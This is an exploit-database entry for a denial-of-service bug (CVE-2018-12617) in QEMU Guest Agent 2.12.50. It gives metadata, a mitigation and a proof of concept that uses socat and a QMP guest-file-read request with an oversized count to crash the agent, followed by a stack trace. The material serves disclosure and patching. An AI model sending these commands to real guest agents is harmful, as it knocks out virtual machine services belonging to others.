QEMU Guest Agent 2.12.50 - Denial of Service

vendor:

QEMU Guest Agent

by:

Fakhri Zulkifli

7.5

CVSS

HIGH

Denial of Service

190

CWE

Product Name: QEMU Guest Agent

Affected Version From: 2.12.50

Affected Version To: 2.12.50

Patch Exists: YES

Related CWE: CVE-2018-12617

CPE: a:qemu:qemu

Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2018-12617/, https://www.rapid7.com/db/vulnerabilities/debian-cve-2018-12617/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp2-cve-2018-12617/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2018-12617/, https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp5-cve-2018-12617/, https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2018-12617/

Platforms Tested: Linux

2018

QEMU Guest Agent 2.12.50 – Denial of Service

QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0() call to trigger a segfault() call when trying to allocate a large memory chunk. The vulnerability can be exploited by sending a specific QMP command to the agent via the listening socket.

Mitigation:

Upgrade to QEMU Guest Agent 2.12.51 or later

Source

Exploit-DB raw data:

# Exploit Title: QEMU Guest Agent 2.12.50 - Denial of Service
# Date: 2018-06-07
# Exploit Author: Fakhri Zulkifli (@d0lph1n98)
# Vendor Homepage: https://www.qemu.org/
# Software Link: https://www.qemu.org/download/
# Version: 2.12.50 and earlier
# Tested on: 2.12.50
# CVE : CVE-2018-12617

# QEMU Guest Agent 2.12.50 and earlier has an integer overflow causing a g_malloc0() 
# call to trigger a segfault() call when trying to allocate a large memory chunk. 
# The vulnerability can be exploited by sending a specific QMP command to 
# the agent via the listening socket.

1st, execute the guest-agent using the following command:

$ qemu-ga -m unix-listen -p /tmp/qga.sock -t /tmp

2nd, on the other console, connect to the UNIX socket using socat:

$ socat unix-connect:/tmp/qga.sock -

3rd, enter the following QMP command:

{"execute":"guest-file-open", "arguments":{"path":"/tmp/poc","mode":"w+”}}
{"return": 1000}
{"execute":"guest-file-read", "arguments":{"handle":1000,"count":4294967295}}

The guest-file-read must be specified with the correct handle value (file descriptor). Different files will have different handle value.

#0 0x5598eed0a1af in calloc /home/user/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:107
#1 0x7f2ce5d7d770 in g_malloc0 (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4f770)
#2 0x5598eed84996 in qmp_marshal_guest_file_read /home/user/qemu/qga/qapi-generated/qga-qapi-commands.c:425:14
#3 0x5598eeda4fcf in do_qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:119:5
#4 0x5598eeda4fcf in qmp_dispatch /home/user/qemu/qapi/qmp-dispatch.c:168
#5 0x5598eed59bff in process_command /home/user/qemu/qga/main.c:589:11
#6 0x5598eed59bff in process_event /home/user/qemu/qga/main.c:626
#7 0x5598eedb5f13 in json_message_process_token /home/user/qemu/qobject/json-streamer.c:105:5
#8 0x5598eee25d9b in json_lexer_feed_char /home/user/qemu/qobject/json-lexer.c:323:13
#9 0x5598eee25333 in json_lexer_feed /home/user/qemu/qobject/json-lexer.c:373:15
#10 0x5598eed5a95e in channel_event_cb /home/user/qemu/qga/main.c:659:9
#11 0x5598eed710c1 in ga_channel_client_event /home/user/qemu/qga/channel-posix.c:92:23
#12 0x7f2ce5d78049 in g_main_context_dispatch (/lib/x86_64-linux-gnu/libglib-2.0.so.0+0x4a049)

# References:
# 1. https://lists.gnu.org/archive/html/qemu-devel/2018-06/msg03385.html